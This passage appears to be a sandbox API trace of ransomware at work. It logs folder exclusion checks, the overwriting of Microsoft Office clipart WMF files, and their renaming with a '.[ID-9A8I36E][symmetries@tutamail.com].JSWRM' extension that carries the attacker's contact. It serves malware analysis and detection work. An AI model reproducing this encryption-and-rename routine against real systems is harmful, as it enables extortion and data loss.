lstrcmpiW (lpString1="BL00130_.WMF", lpString2="perflogs") returned -1 [0074.854] lstrcmpiW (lpString1="BL00130_.WMF", lpString2="documents and settings") returned -1 [0074.854] lstrcmpiW (lpString1="BL00130_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0074.854] lstrcmpiW (lpString1="BL00130_.WMF", lpString2="system volume information") returned -1 [0074.854] lstrcmpiW (lpString1="BL00130_.WMF", lpString2="msocache") returned -1 [0074.854] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413d0 [0074.854] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BL00130_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0074.854] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BL00130_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BL00130_.WMF", lpUsedDefaultChar=0x0) returned 12 [0074.854] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413d0 | out: hHeap=0x1e0000) returned 1 [0074.854] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0074.854] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BL00130_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0074.854] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BL00130_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BL00130_.WMF", lpUsedDefaultChar=0x0) returned 12 [0074.854] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0074.854] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0074.854] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0074.855] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0074.855] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0074.855] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0074.855] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00130_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00130_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x460 [0074.855] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=1464) returned 1 [0074.855] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0074.855] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x5b0) returned 0x23fc98 [0074.856] ReadFile (in: hFile=0x460, lpBuffer=0x23fc98, nNumberOfBytesToRead=0x5b0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesRead=0x345e89c*=0x5b0, lpOverlapped=0x0) returned 1 [0074.857] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0074.857] WriteFile (in: hFile=0x460, lpBuffer=0x23fc98*, nNumberOfBytesToWrite=0x5b0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesWritten=0x345e898*=0x5b0, lpOverlapped=0x0) returned 1 [0074.857] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23fc98 | out: hHeap=0x1e0000) returned 1 [0074.857] CloseHandle (hObject=0x460) returned 1 [0074.857] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0074.857] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0074.857] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0074.857] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d298, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0074.857] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0074.858] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0074.858] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0074.858] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a240 [0074.858] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a240, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0074.858] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a240 | out: hHeap=0x1e0000) returned 1 [0074.858] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23dbc0 [0074.858] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247990 [0074.858] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dbc0 | out: hHeap=0x1e0000) returned 1 [0074.858] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0074.858] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00130_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00130_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00130_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00130_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0074.858] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247990 | out: hHeap=0x1e0000) returned 1 [0074.858] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0074.858] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0074.858] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcdbb058, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xcdbb058, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd5c704c, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x6a0, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="BL00148_.WMF", cAlternateFileName="")) returned 1 [0074.858] lstrcmpiW (lpString1="BL00148_.WMF", lpString2=".") returned 1 [0074.858] lstrcmpiW (lpString1="BL00148_.WMF", lpString2="..") returned 1 [0074.858] lstrcmpiW (lpString1="BL00148_.WMF", lpString2="...") returned 1 [0074.859] lstrcmpiW (lpString1="BL00148_.WMF", lpString2="windows") returned -1 [0074.859] lstrcmpiW (lpString1="BL00148_.WMF", lpString2="recovery") returned -1 [0074.859] lstrcmpiW (lpString1="BL00148_.WMF", lpString2="perflogs") returned -1 [0074.859] lstrcmpiW (lpString1="BL00148_.WMF", lpString2="documents and settings") returned -1 [0074.859] lstrcmpiW (lpString1="BL00148_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0074.859] lstrcmpiW (lpString1="BL00148_.WMF", lpString2="system volume information") returned -1 [0074.859] lstrcmpiW (lpString1="BL00148_.WMF", lpString2="msocache") returned -1 [0074.859] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0074.859] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BL00148_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0074.859] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BL00148_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BL00148_.WMF", lpUsedDefaultChar=0x0) returned 12 [0074.859] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0074.859] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0074.859] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BL00148_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0074.859] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BL00148_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BL00148_.WMF", lpUsedDefaultChar=0x0) returned 12 [0074.859] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0074.859] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0074.859] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0074.859] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0074.859] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0074.860] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0074.860] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00148_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00148_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x460 [0074.861] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=1696) returned 1 [0074.861] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0074.861] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x6a0) returned 0x23fc98 [0074.861] ReadFile (in: hFile=0x460, lpBuffer=0x23fc98, nNumberOfBytesToRead=0x6a0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesRead=0x345e89c*=0x6a0, lpOverlapped=0x0) returned 1 [0074.862] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0074.862] WriteFile (in: hFile=0x460, lpBuffer=0x23fc98*, nNumberOfBytesToWrite=0x6a0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesWritten=0x345e898*=0x6a0, lpOverlapped=0x0) returned 1 [0074.862] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23fc98 | out: hHeap=0x1e0000) returned 1 [0074.862] CloseHandle (hObject=0x460) returned 1 [0074.862] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0074.862] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0074.862] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0074.863] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0074.863] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0074.863] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0074.863] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0074.863] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2b8 [0074.863] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2b8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0074.863] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2b8 | out: hHeap=0x1e0000) returned 1 [0074.863] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d098 [0074.863] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247c78 [0074.863] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d098 | out: hHeap=0x1e0000) returned 1 [0074.863] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0074.863] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00148_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00148_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00148_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00148_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0074.864] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247c78 | out: hHeap=0x1e0000) returned 1 [0074.864] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0074.864] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0074.864] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcdbb058, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xcdbb058, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd5c704c, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x5ec, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="BL00152_.WMF", cAlternateFileName="")) returned 1 [0074.864] lstrcmpiW (lpString1="BL00152_.WMF", lpString2=".") returned 1 [0074.864] lstrcmpiW (lpString1="BL00152_.WMF", lpString2="..") returned 1 [0074.864] lstrcmpiW (lpString1="BL00152_.WMF", lpString2="...") returned 1 [0074.864] lstrcmpiW (lpString1="BL00152_.WMF", lpString2="windows") returned -1 [0074.864] lstrcmpiW (lpString1="BL00152_.WMF", lpString2="recovery") returned -1 [0074.864] lstrcmpiW (lpString1="BL00152_.WMF", lpString2="perflogs") returned -1 [0074.864] lstrcmpiW (lpString1="BL00152_.WMF", lpString2="documents and settings") returned -1 [0074.864] lstrcmpiW (lpString1="BL00152_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0074.864] lstrcmpiW (lpString1="BL00152_.WMF", lpString2="system volume information") returned -1 [0074.864] lstrcmpiW (lpString1="BL00152_.WMF", lpString2="msocache") returned -1 [0074.864] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0074.864] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BL00152_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0074.864] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BL00152_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BL00152_.WMF", lpUsedDefaultChar=0x0) returned 12 [0074.864] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0074.864] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241060 [0074.864] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BL00152_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0074.864] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BL00152_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BL00152_.WMF", lpUsedDefaultChar=0x0) returned 12 [0074.864] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241060 | out: hHeap=0x1e0000) returned 1 [0074.864] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0074.864] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0074.864] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0074.864] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0074.864] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0074.864] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00152_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00152_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x460 [0074.865] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=1516) returned 1 [0074.865] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0074.865] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x5e0) returned 0x23fc98 [0074.865] ReadFile (in: hFile=0x460, lpBuffer=0x23fc98, nNumberOfBytesToRead=0x5e0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesRead=0x345e89c*=0x5e0, lpOverlapped=0x0) returned 1 [0074.915] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0074.915] WriteFile (in: hFile=0x460, lpBuffer=0x23fc98*, nNumberOfBytesToWrite=0x5e0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesWritten=0x345e898*=0x5e0, lpOverlapped=0x0) returned 1 [0074.916] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23fc98 | out: hHeap=0x1e0000) returned 1 [0074.916] CloseHandle (hObject=0x460) returned 1 [0074.916] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0074.916] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0074.916] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0074.916] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0074.916] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0074.916] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0074.916] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0074.916] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a210 [0074.916] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a210, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0074.916] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a210 | out: hHeap=0x1e0000) returned 1 [0074.916] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d3e0 [0074.916] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247d70 [0074.916] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d3e0 | out: hHeap=0x1e0000) returned 1 [0074.916] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0074.916] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00152_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00152_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00152_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00152_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0074.917] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247d70 | out: hHeap=0x1e0000) returned 1 [0074.917] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0074.917] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0074.917] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcd6eb88, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xcd6eb88, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xcdbb058, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xf92, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="BL00194_.WMF", cAlternateFileName="")) returned 1 [0074.917] lstrcmpiW (lpString1="BL00194_.WMF", lpString2=".") returned 1 [0074.917] lstrcmpiW (lpString1="BL00194_.WMF", lpString2="..") returned 1 [0074.917] lstrcmpiW (lpString1="BL00194_.WMF", lpString2="...") returned 1 [0074.917] lstrcmpiW (lpString1="BL00194_.WMF", lpString2="windows") returned -1 [0074.917] lstrcmpiW (lpString1="BL00194_.WMF", lpString2="recovery") returned -1 [0074.917] lstrcmpiW (lpString1="BL00194_.WMF", lpString2="perflogs") returned -1 [0074.917] lstrcmpiW (lpString1="BL00194_.WMF", lpString2="documents and settings") returned -1 [0074.917] lstrcmpiW (lpString1="BL00194_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0074.917] lstrcmpiW (lpString1="BL00194_.WMF", lpString2="system volume information") returned -1 [0074.917] lstrcmpiW (lpString1="BL00194_.WMF", lpString2="msocache") returned -1 [0074.917] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241218 [0074.917] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BL00194_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0074.917] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BL00194_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BL00194_.WMF", lpUsedDefaultChar=0x0) returned 12 [0074.917] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241218 | out: hHeap=0x1e0000) returned 1 [0074.917] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0074.917] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BL00194_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0074.917] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BL00194_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BL00194_.WMF", lpUsedDefaultChar=0x0) returned 12 [0074.917] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0074.917] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0074.917] 